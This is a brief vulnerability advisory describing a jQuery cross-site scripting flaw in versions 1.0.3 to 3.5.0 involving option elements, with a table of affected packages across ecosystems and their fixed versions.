In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
| Package (Ecosystem) | Introduced | Fixed | Limit |
|---|---|---|---|
| jquery(npm) | 1.0.3 | 3.5.0 | N/A |
| jquery-rails(RubyGems) | 0 | 4.4.0 | N/A |
| jQuery(NuGet) | 1.0.3 | 3.5.0 | N/A |
| org.webjars.npm:jquery(Maven) | 1.0.3 | 3.5.0 | N/A |
| components/jquery(Packagist) | 1.0.3 | 3.5.0 | N/A |
CVSS Metrics
